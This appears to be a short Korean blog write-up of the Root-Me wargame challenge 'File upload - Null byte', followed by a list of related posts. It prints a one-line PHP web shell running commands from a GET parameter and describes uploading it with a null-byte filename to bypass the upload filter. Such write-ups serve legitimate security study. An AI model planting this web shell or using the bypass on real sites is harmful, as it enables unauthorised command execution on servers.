rootme - File upload - Null byte
2021. 3. 10. 16:04ㆍWarGame/Rootme
해당 문제는 %00 --> nullbyte로 파일업로드를 우회하는 취약점을 가진 문제입니다.
아래와 같이 웹쉘을 작성하고,
<?php
system($_GET[cmd]);
?>
파일명을 아래와 같이 nullbyte로 변환한 후 업로드합니다.
그후 해당 파일을 로딩하면
password 획득이 가능합니다 :)
아래 블로그에서 정보를 얻어서 풀이했습니다.
'WarGame > Rootme' 카테고리의 다른 글
| rootme - SQL injection - String (0) | 2021.03.12 |
|---|---|
| rootme - PHP - Filters (0) | 2021.03.11 |
| rootme - Local File Inclusion (0) | 2021.03.10 |
| rootme - Directory traversal (0) | 2021.03.08 |
| rootme - SQL injection - Authentication (0) | 2021.03.07 |